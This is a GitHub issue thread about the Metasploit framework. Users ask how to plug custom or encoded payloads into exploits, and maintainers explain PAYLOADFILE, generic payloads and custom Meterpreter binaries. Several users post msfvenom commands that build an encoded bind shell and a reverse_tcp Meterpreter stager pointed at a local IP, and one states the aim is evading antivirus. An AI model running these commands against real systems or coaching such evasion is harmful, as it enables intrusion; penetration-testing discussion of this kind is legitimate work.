How Can I Use Custom Payload in Metasploit?

[luai24]

Hello,

I was wondering. I have a payload that I want to encode and use with an exploit (without having to download it on victim machine aka. user interaction). I realize this is done via msfvenom, however I was wondering if there's a way that allows me to encode a payload and use it with an exploit directly without generating it or if I could generate it and later on set the payload path to it.

Thanks in advance.

[smcintyre-r7]

Some options come to mind. It depends alot on the details of what your payload is and what exploit + configuration you'd like to use it with.

payload/generic/custom

If your payload is straight up shellcode, ready to be executed at the first byte, you can use the payload/generic/custom payload. Take care to ensure that the shellcode is the correct architecture. Set the PAYLOADFILE datastore option to read the payload from disk. IIRC it'll be encoded automatically based on the module's defined requirements.

EXE::Template

Alot of exploits will generate a portable executable file (PE) or even an ELF if you're targeting a Linux system. If the EXE::Template advanced option is present, you can set it to your custom .exe or ELF executable. In this case, the configured payload is ignored. You can check if this is present using the show advanced command. Be careful because some exploits will register this option, but then not use it depending on the exploit's configuration and target settings.

payload/cmd/*/generic

If your exploit is executing an OS command, you can use the cmd/unix/generic or cmd/windows/generic payloads. They allow you to set the CMD datastore option to whatever command you want to run. This is similar to using the generic/custom payload.

Custom Meterpreter Binaries

If your payload is a custom meterpreter binary that you build yourself, you can place the built artifacts in ~/.msf4/payloads/meterpreter and they'll be used when you select a Meterpreter payload that they're compatible with.

[luai24]

Would payload/generic/custom work with a payload that I generated from msfvenom? For example, a file generated like this "msfvenom -a x86 --platform Windows -p windows/shell/bind_tcp -e x86/shikata_ga_nai -b '\x00' -i 3 -f python" can I later on try this with generic custom and set the path to the generated file? If so what are the steps? Thanks.

[zsamamah]

I generated a payload using msfvenom and then tried to attach it with a certain exploit using payload/generic/custom by the PAYLOADFILE attribute, but it didn't work! [+] The payload was cmd/windows/powershell/x64/powershell_reverse_tcp and it's format was rb (ruby)

[smcintyre-r7]

The problem that both of you are running into is that the payload needs to be in the "raw" format, that is you need to specify -f raw to ensure that it's literally shellcode instead of Python or Ruby code.

After that set PAYLOADFILE to your raw shellcode file.

[EvergreenCartoons]

If your payload is a custom meterpreter binary that you build yourself, you can place the built artifacts in ~/.msf4/payloads/meterpreter and they'll be used when you select a Meterpreter payload that they're compatible with.

I wish this was far better documented (how to rebuild/use custom built metasploit payloads) for evasion purposes.

Maybe that should be an issue in its own right for docs reasons.

[gwillcox-r7]

If your payload is a custom meterpreter binary that you build yourself, you can place the built artifacts in ~/.msf4/payloads/meterpreter and they'll be used when you select a Meterpreter payload that they're compatible with.

I wish this was far better documented (how to rebuild/use custom built metasploit payloads) for evasion purposes.

Maybe that should be an issue in its own right for docs reasons.

This is documented already at https://github.com/rapid7/metasploit-payloads in the README.md file though? Its under the testing directions though if you wanted us to move it to the https://docs.metasploit.com website we could do so. Most users aren't expected to be diving into things this deep which may explain why this information wasn't ported over earlier. That being said, if it would make things easier to find we could add it to one of the Advanced sections; might even be possible to append this to an existing section as I think we have some info there on evasion already.

[zsamamah]

The problem that both of you are running into is that the payload needs to be in the "raw" format, that is you need to specify -f raw to ensure that it's literally shellcode instead of Python or Ruby code.

After that set PAYLOADFILE to your raw shellcode file.

I created a raw format shellcode using msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.100.87 LPORT=4444 -f raw > shellcode.raw then i assigned to PAYLOADFILE attribute the path to the raw shellcode but also nothing happened!

[smcintyre-r7]

@zsamamah You're assigning shellcode.raw as PAYLOADFILE in an exploit right? And then you're saying that nothing happens? There's a bunch of things that could be wrong.

1. The exploit may not be working for reasons, unrelated to the payload. Try it directly with the payload set to windows/meterpreter/reverse_tcp to check.
2. You need to start a windows/meterpreter/reverse_tcp handler yourself to get a session because the payload won't start it for you since it's set to custom.
3. Your shellcode could have been corrupted if you modified it. You should use a reliable source to validate that the shellcode is correct and functional. If you didn't modify it, then you should just use the windows/meterpreter/reverse_tcp payload directly so it starts the handler (see point 2).
   1. As a subreason of why the shellcode could be incorrect, it may not be the correct architecture. Check the exploit that you're trying to deliver it with and make sure that it's expecting x86 shellcode which is what the windows/meterpreter/reverse_tcp stager you placed in shellcode.raw is.

[luai24]

2. windows/meterpreter/reverse_tcp

Point is, we have exploit/multi/http/apache_couchdb_erlang_rce in which we want to set the payload for this exploit to be an encoded payload for AV detection purposes. We want the exploit to be able to send and run the encoded payload as it does with unencoded payloads, it's not like I'm going to send the payload to the victim myself.

Thanks in advance.

[github-actions[bot]]

Hi!

This issue has been left open with no activity for a while now.

We get a lot of issues, so we currently close issues after 60 days of inactivity. It’s been at least 30 days since the last update here. If we missed this issue or if you want to keep it open, please reply here. You can also add the label "not stale" to keep this issue open!

As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.